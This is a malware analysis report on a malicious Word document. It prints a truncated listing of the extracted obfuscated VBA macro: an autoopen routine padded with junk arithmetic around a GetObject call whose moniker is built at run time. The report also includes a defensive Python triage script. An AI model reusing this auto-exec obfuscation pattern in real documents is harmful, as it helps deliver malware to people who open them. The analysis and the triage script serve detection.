Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95486e2d7bdf753a…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 165.4 KB
Created: 2019-03-28 13:49:00
Authoring application: Microsoft Office Word
First seen: 2020-09-04
MD5: 5988dff21b137091544a4ad9ae7def47
SHA-1: 35523d127211d1b0d6d5c202e866ee1b3f62ce04
SHA-256: 95486e2d7bdf753ab5dd9caeb51cbb91a06f11521db0fea52573e902a03da112
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document (OLE/.doc container) whose VBA project contains an auto-execution entry point, Sub autoopen(), which Word runs as soon as the document is opened with macros enabled; no further user interaction is needed (T1204.002 leading to T1059.005). The routine starts with On Error Resume Next and is padded with repeated If ... Then blocks whose bodies are side-effect-free arithmetic over undeclared variables (Asc, CDbl, CVar, Log, Rnd, Sgn) assigned to variables that are never read; the error handler swallows the runtime errors those expressions raise, so the padding neither breaks execution nor does anything useful, which is its only purpose. The one operative statement is Set dQcQwZ = GetObject(...), whose argument is concatenated at run time from properties of two UserForm modules (cAQoUA and oCD44AB), so the object moniker never appears as a string literal in the source. GetObject on an attacker-supplied moniker is a common way for a macro to obtain an automation object that can start a process, and the heuristics read the combination of auto-exec entry, GetObject and heavy obfuscation as staging for download and execution of a second-stage payload. The moniker itself cannot be recovered from the source listing alone; it lives in the form storage of those two modules. The 'legacy WordBasic' finding below is triggered by the AutoOpen name marker; since a complete VBA project was recovered (macros.bas), it overlaps with the AutoOpen VBA finding rather than adding independent evidence.

Heuristics (7 findings)

  • ClamAV detection [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sonbokli-6915370-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    The document contains VBA macro code (see the extracted macros.bas artifact below).
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure (Sub autoopen() in module FBAACUA), which Word runs automatically when the document is opened with macros enabled.
  • GetObject call [high] OLE_VBA_GETOBJ
    The macro calls GetObject, which binds to an automation object by moniker (a WMI moniker, for instance) and is a common way for a macro to start a process. Here the moniker string is assembled at run time from form-control properties rather than written as a literal.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source extraction failed, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic is meant for the case where no modern VBA project was recovered and no stronger macro-virus family marker is present; it is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the marker is the autoopen name that also appears in the recovered VBA project, so this finding overlaps with OLE_VBA_AUTOOPEN rather than being independent evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier found in any Office document that carries OOXML drawing content; it is not a download location.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  22480 bytes
SHA-256: e8fd397f07baa49143de35dc7649e3d286e1f2ed3820ff5e4095a349b7dbd322

Preview: first 1,000 lines of the extracted script (the listing below is truncated)
Attribute VB_Name = "h_AAAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cAQoUA"
Attribute VB_Base = "0{E68407A1-27D4-4170-B10E-001A769AFD77}{F11861FC-9545-452E-AC97-4B7341A0EFE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "oCD44AB"
Attribute VB_Base = "0{D8136306-5B6B-442E-B086-F6E3315371B6}{3E377262-4FF8-4EA2-9A43-CFA3FC4A53A5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "FBAACUA"
Function TBAAk1A()
   If UBZAoA = wAAABA_A Then
GwAAABB = _
zAwxAA / Asc(fcAoBZ1) - _
ocXCX_Uw * CDbl(35823486) / YAGXAcDc * CVar( _
716950983 * Log(TAABQAG1)) / kADoQw * Rnd( _
796474342) * 453908089 * Sgn(BZ_AXA4A / Log(858749296))
End If
   If PADUxBGX = RUcBwAD Then
rAAUBUkD = _
QA1XcoBD / Asc(WQ4CAAQ) - _
N1XXDAAA * CDbl(255666498) / uwZ_UQ * CVar( _
25453767 * Log(jUAQAA)) / QAA4UA * Rnd( _
913775467) * 432340579 * Sgn(zBCBB4w / Log(772446734))
End If
   If kUAB4w = TAC_AG Then
QAcBBD = _
DAUAcA / Asc(GBDXAAD) - _
KkACAk__ * CDbl(643395486) / hkB4AAZ * CVar( _
569819359 * Log(N4wZAA)) / JQAABDc * Rnd( _
174345843) * 237670556 * Sgn(L1AQAAc1 / Log(744485854))
End If
   If a4xABQ_1 = dAZA4Ak Then
ZQwQxXZ = _
k_AxQDAD / Asc(dcA4ZU) - _
YGo1cAA * CDbl(208523729) / qcwAC4 * CVar( _
585513478 * Log(cAABAAAD)) / JAAUQxAx * Rnd( _
421790389) * 467243095 * Sgn(QAAQUBZA / Log(20797406))
End If
   If vAAAAAGA = JQAADAX4 Then
k4Q1cCQU = _
RABcDA1 / Asc(qBAZ4AwQ) - _
qww4UA * CDbl(315123915) / woCAUDUQ * CVar( _
962643608 * Log(FAAB1UAk)) / nXZAZXDA * Rnd( _
873897872) * 715669245 * Sgn(bQBo1D / Log(425539722))
End If
   If cAAAQQ = QUBwDQ Then
jC_AUXB = _
doZoABx / Asc(GQBAcw) - _
UACDU1ck * CDbl(676259274) / iUDDAAwo * CVar( _
732191294 * Log(cAUXUBQ)) / LGGQAAAB * Rnd( _
578755640) * 517440301 * Sgn(jDwAAU / Log(197290610))
End If
   If DBoUAA = mUABQA Then
OAAADAQ = _
tD_o1UA / Asc(EA4w_4) - _
jkA_AZ_A * CDbl(11632847) / VxxxAco * CVar( _
368683111 * Log(X1AxAAD)) / oAwwDU * Rnd( _
222914783) * 923088206 * Sgn(zw1AAUAA / Log(305909345))
End If
End Function
Sub autoopen()
On Error Resume Next
   If moDACwAB = qAAUAD Then
wBAAAQ = _
QAZDD44D / Asc(RkACAc1Q) - _
HAQUoA * CDbl(243268681) / YCAAAAU * CVar( _
52488796 * Log(LBGwCAUU)) / OckQUQZo * Rnd( _
122265484) * 485236334 * Sgn(zAxAQCD / Log(48875873))
End If
   If OZGUQk = NAA1QAA Then
sUADAUk = _
zAQAok / Asc(wUDAAAc) - _
XBAQG4_ * CDbl(506926308) / LCBQQ1AA * CVar( _
265981501 * Log(zUDCwAXA)) / SQA11oG * Rnd( _
288272483) * 48616091 * Sgn(jAxAD4QZ / Log(393902824))
End If
   If lcUAUcA = UxXAcA1 Then
QUZAAAQA = _
jAACA1 / Asc(ax_AA_A) - _
NQAAwkAX * CDbl(898287762) / dAZcUAU * CVar( _
16327239 * Log(oAxBQA)) / OxAADA * Rnd( _
983721101) * 954291778 * Sgn(LkQQAZQ / Log(874961757))
End If
Set dQcQwZ = GetObject(cAQoUA.zAADAxQA.Text + oCD44AB.JDcAoAw + cAQoUA.zAADAxQA)
   If QUAwZUk = CcAABQC Then
oAcwBAUB = _
WBAAQx / Asc(a_AAAAD) - _
HUXoDACB * CDbl(51970150) / dAQGAk * CVar( _
173544254 * Log(MQAAAAA)) / wQAA_B * Rnd( _
131735526) * 568759216 * Sgn(CZoU4B / Log(59359302))
End If
   If a_wokA1 = oDAwA4U Then
fxBwXADA = _
JDxxAkAB / Asc(cAQckA) - _
vZQUXD * CDbl(105261486) / OA4AwUA * CVar( _
189223129 * Log(RAkXQABX)) / sDADccD * Rnd( _
431769219) * 792871207 * Sgn(u4__Bc_ / Log(324645812))
End If
If 921028 = 921028 Then
   If SC1oBUD = wDAxAB Then
nAUDoAA = _
mQ__D4c / Asc(QxDwoA) - _
qUAoGDQ * CDbl(510980311) / bQ_XGDcA * CVar( _
590237673 * Log(i_Q_QQAw)) / iUUCwD * Rnd( _
692497723) * 75840401 * Sgn(w
... (truncated)
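As an added example for this report (not part of the page, and not oletools code or the scanner that produced the findings above), the Python below performs the source-level version of the AutoOpen, GetObject and obfuscation checks on macro text of the kind shown in macros.bas: it folds VBA line continuations, finds auto-exec entry points, strips the padding blocks so that the single GetObject statement is left, and records that the moniker is assembled from form-control properties instead of a string literal. SAMPLE is a constructed excerpt modelled on the autoopen routine above (identifiers copied, body abridged); the function names, the token lists and the result keys are the example's own choices.

```python
"""Triage helper for an obfuscated Word VBA project like the macros.bas listing above.
Added example for this report: not oletools code and not the scanner behind the findings.
Input is decoded VBA source as olevba emits it; SAMPLE below is a constructed excerpt."""
import re

# Entry points Office runs as soon as the document is opened with macros enabled.
AUTOEXEC = re.compile(r'^\s*(?:Public\s+|Private\s+)?Sub\s+(autoopen|auto_open|autoexec|'
                      r'autoclose|document_open|document_close|workbook_open)\s*\(', re.I | re.M)
EXEC_TOKENS = ("GetObject", "CreateObject", "Shell", "WScript.Shell", "winmgmts",
               "Win32_Process", "URLDownloadToFile", "XMLHTTP", "ShellExecute")  # launcher / downloader
JUNK_FUNCS = {"Asc", "CDbl", "CVar", "CInt", "CLng", "Log", "Rnd", "Sgn", "Abs", "Sqr", "Int", "Fix"}  # no side effects
IF_IDENT_CMP = re.compile(r'^\s*If\s+[A-Za-z_]\w*\s*=\s*[A-Za-z_]\w*\s+Then\s*$')
TAUT_IF = re.compile(r'^\s*If\s+(\d+)\s*=\s*(\d+)\s+Then\s*$')
END_IF = re.compile(r'^\s*End If\s*$')
JUNK_RHS = re.compile(r'^[\w\s+\-*/()]*$')  # identifiers, integer literals, arithmetic, parens only

def join_continuations(src):
    """Fold VBA ' _' line continuations so each statement occupies one line."""
    out, buf = [], ""
    for line in src.splitlines():
        if line.rstrip().endswith(" _"):
            buf += line.rstrip()[:-1]
        else:
            out.append(buf + line)
            buf = ""
    return out + ([buf] if buf else [])

def is_junk_assignment(line):
    """'x = <arithmetic over bare identifiers and numeric-only functions>': side-effect free.
    Anything with a string literal, member access (obj.Prop) or other call is kept."""
    m = re.match(r'^\s*[A-Za-z_]\w*\s*=\s*(.+)$', line)
    if not m or not JUNK_RHS.match(m.group(1)):
        return False
    return all(fn in JUNK_FUNCS for fn in re.findall(r'([A-Za-z_]\w*)\s*\(', m.group(1)))

def strip_junk(lines):
    """Drop 'If a = b Then / junk assignment / End If' padding blocks."""
    out, i = [], 0
    while i < len(lines):
        if (i + 2 < len(lines) and IF_IDENT_CMP.match(lines[i])
                and is_junk_assignment(lines[i + 1]) and END_IF.match(lines[i + 2])):
            i += 3
            continue
        out.append(lines[i])
        i += 1
    return out

def unwrap_tautologies(lines):
    """Remove 'If 921028 = 921028 Then' wrappers together with their matching End If."""
    out, stack = [], []
    for line in lines:
        m = TAUT_IF.match(line)
        if m and m.group(1) == m.group(2):
            stack.append(True)  # dropped wrapper, so drop its End If as well
            continue
        if re.match(r'^\s*If\b.*\bThen\s*$', line):
            stack.append(False)
        elif END_IF.match(line) and stack and stack.pop():
            continue
        out.append(line)
    return out

def triage(src):
    """Source-level version of the AutoOpen / GetObject / obfuscation checks in the findings."""
    joined = join_continuations(src)
    residual = unwrap_tautologies(strip_junk(joined))
    text = "\n".join(residual)
    arg = re.search(r'GetObject\((.*)\)', text)
    return {
        "entry_points": sorted({m.group(1).lower() for m in AUTOEXEC.finditer(src)}),
        "error_suppressed": bool(re.search(r'On Error Resume Next', src, re.I)),
        "junk_lines_removed": len(joined) - len(residual),
        "exec_tokens": sorted(t for t in EXEC_TOKENS if re.search(r'\b%s\b' % re.escape(t), text)),
        # Moniker assembled from form-control properties instead of a string literal.
        "getobject_target_is_runtime_built": bool(arg) and '"' not in arg.group(1)
        and bool(re.search(r'[A-Za-z_]\w*\.[A-Za-z_]', arg.group(1))),
        "residual": residual,
    }

# Constructed excerpt modelled on the page's macro (identifiers copied, body abridged).
SAMPLE = '''Sub autoopen()
On Error Resume Next
   If moDACwAB = qAAUAD Then
wBAAAQ = _
QAZDD44D / Asc(RkACAc1Q) - HAQUoA * CDbl(243268681) / YCAAAAU * CVar(52488796 * Log(LBGwCAUU)) / Rnd(122265484)
End If
Set dQcQwZ = GetObject(cAQoUA.zAADAxQA.Text + oCD44AB.JDcAoAw + cAQoUA.zAADAxQA)
If 921028 = 921028 Then
   If SC1oBUD = wDAxAB Then
nAUDoAA = mQ__D4c / Asc(QxDwoA) - qUAoGDQ * CDbl(510980311) * Sgn(Log(1))
End If
End If
End Sub
'''
```

Call triage(SAMPLE), or pass it the text of the macros.bas artifact, and read 'residual' first: for this excerpt it collapses to the Sub line, On Error Resume Next, the GetObject statement and End Sub, with 'junk_lines_removed' reporting how much padding was discarded. The filter is deliberately conservative: an assignment containing a string literal, a member access or a call outside JUNK_FUNCS is never dropped, so a real action hidden inside one of the padding blocks would survive into the residual. The moniker itself is not in the source; it has to be read out of the form storage of cAQoUA and oCD44AB (olevba reports such values as form strings) or observed by detonating the document in a sandbox.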